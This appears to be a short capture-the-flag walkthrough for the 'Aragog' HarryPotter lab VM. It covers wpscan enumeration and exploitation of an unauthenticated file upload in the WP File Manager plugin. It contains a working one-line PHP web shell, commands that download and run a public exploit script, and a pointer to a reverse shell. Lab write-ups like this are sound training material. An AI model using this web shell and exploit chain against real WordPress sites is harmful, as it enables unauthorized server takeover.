search

Aragog

Aragog is the 1st VM of 3-box HarryPotter VM series in which you need to find 2 horcruxes hidden inside the machine...

nmap scan reveals 22,80

Gobuster reveals a WP Blog

// wpscan
 wpscan --url http://192.168.1.101/blog
 
 wpscan --api-token=$WPSCAN_KEY --url=http://1.2.3.4/blog -e p --plugins-detection aggressive

The important keywords are highlighted on the blog. Hence, we might guess that there might be some vulnerable plugins. Also, since the website is using wordpress, we will be using wpscan for going deeper. Also, make sure you have wpscan API token to identify vulnerable plugins. 

// first tried to attack plugin 1
// NO backup files could be found in the /wp-content/uploads/wp-file-manager-pro/fm_backup directory. 
abadoned this and moved to next plugin identified by wpscan

// Arbitary unauthenticated upload
// link below
https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

ensure to create payload.php

<?php
system($_GET['cmd']);
?>


wget -c "https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py"
python3 2020-wp-file-manager-v67.py http://wordpress.aragog.hogwarts/blog
 
http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/files/payload.php?cmd=pwd

upload a php-reverse shell

PreviousMatrixNextFix VM Networking

Last updated